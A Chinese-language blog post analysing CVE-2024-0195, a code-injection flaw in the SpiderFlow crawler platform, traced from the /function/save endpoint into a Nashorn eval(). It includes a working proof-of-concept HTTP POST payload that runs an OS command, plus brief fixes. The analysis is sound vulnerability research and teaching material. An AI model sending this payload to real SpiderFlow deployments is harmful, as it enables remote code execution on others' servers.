CVE-2024-0195 利用分析

最新推荐文章于 2024-07-06 11:48:34 发布
最新推荐文章于 2024-07-06 11:48:34 发布
阅读量514 收藏 11
点赞数 6
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/135703981
版权
文章描述了SpiderFlow爬虫平台中存在代码注入漏洞,攻击者可通过自定义函数的`validScript`调用恶意构造的JavaScript代码,导致服务器失陷。文章详细介绍了漏洞流程、搭建过程、利用方式以及提供了解决方案——过滤`script`参数和设置沙箱。
摘要由CSDN通过智能技术生成

1. 漏洞介绍

SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionNameparameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。

2. 流程图分析

图片

 

3. 搭建过程

1. IDEA Gitee 快速搭建

图片

URL : https://gitee.com/jmxd/spider-flow.git

图片

2. 数据库搭建

我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:

图片

图片

图片

图片

3. 数据库连接

图片

然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties

图片

4. 运行

spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java

图片

然后访问路径http://localhost:8088/,成功搭建!

图片

4. 利用过程

首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:

图片

发现这里有个validScript函数调用了eval危险函数:

    public static void validScript(String functionName,String parameters,String script) throws Exception {
        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
    }

然后这里的我们去看看eval具体执行的参数是怎么生成的:

图片

    private static String concatScript(String functionName,String parameters,String script){
        StringBuffer scriptBuffer = new StringBuffer();
        scriptBuffer.append("function ")
                .append(functionName)
                .append("(")
                .append(parameters == null ? "" : parameters)
                .append("){")
                .append(script)
                .append("}");
        return scriptBuffer.toString();
    }

可以看到concatScript 方法中,它接受三个参数 functionNameparameters 和 script,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。

在上面的函数中将产生如下的字符串:

function functionName(parameters){script}

很明显我们可以构造恶意的script来导致RCE:

例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

这样的话我们最终的字符串将会变成:

function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}

然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。

然后我们分析是哪个函数调用了validScript函数

图片

    public String saveFunction(Function entity) {
        try {
            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
            super.saveOrUpdate(entity);
            init();
            return null;
        } catch (Exception e) {
            logger.error("保存自定义函数出错",e);
            return ExceptionUtils.getStackTrace(e);
        }
    }

然后在FunctionController.java调用了saveFunction

@RestController
@RequestMapping("/function")
public class FunctionController {
    ......
    @RequestMapping("/save")
    public String save(Function function){
        return functionService.saveFunction(function);
    }
    ......
}

然后我们现在就可以去实际的功能点看需要哪些参数:

图片

图片

于是我们直接写出payload:

POST /function/save HTTP/1.1
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: localhost:8088

id=&name=rce&parameter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

成功命令执行弹出计算器:

图片

5. 修复方式

  • • 过滤好script参数

  • • 设置沙箱

5. 总结

这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。

蚁景网络安全
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195)
0xSec
01-10 1688
SpiderFlow爬虫平台src/main/java/org/spiderflow/controller/FunctionController.java文件的FunctionService.saveFunction函数中发现了一个被归类为关键的漏洞。该漏洞可导致代码注入,并允许远程发起攻击,可导致服务器失陷。
CVE-2024-0195:SpiderFlow爬虫平台代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
02-02 309
在SpiderFlow爬虫平台项目中 spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入
CVE-2024-0195-SpiderFlow爬虫平台远程命令执行漏洞分析
shelter1234567的博客
01-18 2122
本次我们继续模拟漏洞发掘的思路。此次选择的项目是一个基于springboot的开源项目,该系统/function/save接口存在RCE漏洞。
【复现】Spider-Flow RCE漏洞(CVE-2024-0195)_16
fushuang333的博客
01-12 1045
【复现】Spider-Flow RCE漏洞(CVE-2024-0195),Spider Flow 是一个高度灵活可配置的爬虫平台,用户无需编写代码,以流程图的方式,即可实现爬虫。
SpiderFlow爬虫平台漏洞分析CVE-2024-0195),网络安全中为什么需要Handler
m0_61943758的博客
04-15 317
然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。​ 然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。⑧ APP客户端安全检测指南(安卓+IOS)⑦ 最新网安大厂面试题合集(含答案)④ 150+网安攻防实战技术电子书。⑥ 超1800页CTF实战技巧手册。​ 然后我们分析是哪个函数调用了。​ 例如script的值可以为。① 网安学习成长路径思维导图。② 60+网安经典常用工具包。方法中,它接受三个参数。
[漏洞复现] SpiderFlow (CVE-2024-0195)
k5664524的博客
01-11 954
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器
CVE-2022-22947 分析
KeJiGuaiKa的博客
09-01 187
的官方补丁 [Comparing v3.0.6…v3.0.7 · spring-cloud/spring-cloud-gateway],官方在。在关键位置打上断点后,运行 app 尝试进入漏洞点。翻阅下官方文档 Spring Cloud Gateway[^1] 看下如何定义一个简单的路由。那如何通过远程触发呢?根据 Gateway Actuator API [^2] 文档,接口提供了创建路由的能力 其中 json 构造方式如文档中的。通过 POST 发送 exp。debug 程序后,发现。...
CVE-2022-22947分析
csOPPO的博客
10-12 68
在关键位置打上断点后,运行 app 尝试进入漏洞点。翻阅下官方文档 Spring Cloud Gateway[^1] 看下如何定义一个简单的路由。至此,可以得出 gateway 在对 filters 进行转换解析时触发了 spel 注入。那如何通过远程触发呢?根据 Gateway Actuator API [^2] 文档,接口提供了创建路由的能力 其中 json 构造方式如文档中的。通过 POST 发送 exp。注入下 spel 表达式。
CVE-2017-12615用脚本
04-16
"CVE-2017-12615用脚本"文件可能包含用于测试或演示该漏洞的代码。这种脚本通常由安全研究人员或白帽黑客编写,用于验证漏洞的存在或测试修复措施的有效性。在安全环境中,这样的脚本可以帮助我们理解漏洞的工作...
ElasticSearch 远程代码执行漏洞分析CVE-2015-1427)&高级用方法1
08-08
ElasticSearch 远程代码执行漏洞分析CVE-2015-1427)&高级用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
CVE-2021-1732-Exploit:CVE-2021-1732漏洞
03-06
在提供的压缩包中,"CVE-2021-1732-Exploit-main"可能是一个示例代码或者用程序,用于演示如何触发这个漏洞。研究这个文件可以帮助安全专家理解漏洞的工作原理,从而更好地防御和修复。不过,直接运行这样的文件...
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以用SaltStack
03-03
这可能包括漏洞用代码示例、漏洞分析报告、修复脚本或配置建议等。 总之,CVE-2021-25281和CVE-2021-25282是盐栈用户必须重视的安全事件。理解漏洞的本质、风险以及如何修复是保护系统免受攻击的重要步骤。通过...
CVE-2020-1938.zip
04-15
在提供的压缩包文件AJPy-master中,很可能包含了关于这个漏洞的详细分析用工具或者缓解措施的代码。研究这些资料可以帮助我们更好地理解漏洞的工作原理,以及如何有效地防止或检测此类攻击。对于系统管理员和...
【CVE复现计划】CVE-2024-0195
m0_63138919的博客
04-05 1083
本文以春秋云镜为靶场,进行该CVE-2024-0195的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
Spider-Flow平台 RCE(CVE-2024-0195 RCE漏洞)
m0_64366018的博客
01-12 575
SpiderFlow是ssssssss-team开源的一个爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。该系统存在RCE漏洞,攻击者构造恶意命令能够用该漏洞获取服务器权限,导致服务器沦陷。
SpiderFlow爬虫平台漏洞分析CVE-2024-0195)
蚁景网安学院
01-18 831
在SpiderFlow爬虫平台项目中,此漏洞构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8319
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【ARMv8/v9 GIC 系列 5.4 -- 中断分组与安全及优先级配置】
最新发布
CodingCos的博客
07-06 37
在这两种状态中,都可以执行用户级别和特权级别的代码,但是在非安全状态下执行的软件只能通过对安全监视器(Secure Monitor)的系统调用来访问安全状态。GIC(通用中断控制器)架构支持与这两种安全状态相关的中断的路由和处理。在多处理器系统中,系统内的一个或多个处理元素(PEs)可能支持仅在安全状态下可用的资源访问,或仅在非安全状态下可用的资源访问。这种灵活的配置允许系统根据需要调整中断处理的优先级分组,使得系统能够更有效地响应不同优先级的中断请求。标志指示GIC是否配置为支持ARMv8-A安全模型。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 539
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
cve-2024-1086
06-15
CVE-2024-1086是一个尚未公开的漏洞标识符,通常在安全公告发布之前,漏洞的具体细节是保密的,以防止恶意用。CVE代表Common Vulnerabilities and Exposures(通用漏洞和暴露),由美国国家安全局(NSA)和CERT ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值